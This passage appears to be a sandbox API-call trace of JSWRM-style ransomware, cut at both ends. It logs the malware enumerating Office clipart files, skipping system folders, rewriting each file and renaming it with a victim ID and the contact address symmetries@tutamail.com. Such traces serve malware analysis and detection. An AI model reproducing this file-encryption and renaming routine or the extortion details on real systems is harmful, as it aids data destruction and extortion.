lpUsedDefaultChar=0x0) returned 12 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00693_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00693_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00693_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00693_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00693_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.952] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4408) returned 1 [0092.952] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1130) returned 0x205850 [0092.952] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1130, lpOverlapped=0x0) returned 1 [0092.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.955] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1130, lpOverlapped=0x0) returned 1 [0092.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.955] CloseHandle (hObject=0x314) returned 1 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0092.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0092.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0092.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.955] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.956] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3926, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00720_.WMF", cAlternateFileName="")) returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2=".") returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="..") returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="...") returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="windows") returned -1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="recovery") returned -1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="perflogs") returned -1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="documents and settings") returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="system volume information") returned -1 [0092.956] lstrcmpiW (lpString1="PE00720_.WMF", lpString2="msocache") returned 1 [0092.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0092.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00720_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00720_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00720_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0092.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0092.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00720_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00720_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00720_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0092.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.957] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14630) returned 1 [0092.957] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3920) returned 0x24d210 [0092.957] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3920, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.960] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3920, lpOverlapped=0x0) returned 1 [0092.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.960] CloseHandle (hObject=0x314) returned 1 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0092.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0092.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0092.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0092.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0092.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.961] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1afc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00723_.WMF", cAlternateFileName="")) returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2=".") returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="..") returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="...") returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="windows") returned -1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="recovery") returned -1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="perflogs") returned -1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="documents and settings") returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="system volume information") returned -1 [0092.961] lstrcmpiW (lpString1="PE00723_.WMF", lpString2="msocache") returned 1 [0092.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00723_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00723_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00723_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0092.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00723_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00723_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00723_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0092.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.962] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6908) returned 1 [0092.962] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1af0) returned 0x205850 [0092.962] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1af0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1af0, lpOverlapped=0x0) returned 1 [0092.964] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.964] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1af0, lpOverlapped=0x0) returned 1 [0092.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.964] CloseHandle (hObject=0x314) returned 1 [0092.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0092.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0092.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.966] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb1a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00726_.WMF", cAlternateFileName="")) returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2=".") returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="..") returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="...") returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="windows") returned -1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="recovery") returned -1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="perflogs") returned -1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="documents and settings") returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="system volume information") returned -1 [0092.966] lstrcmpiW (lpString1="PE00726_.WMF", lpString2="msocache") returned 1 [0092.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00726_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00726_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00726_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00726_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00726_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00726_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0092.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 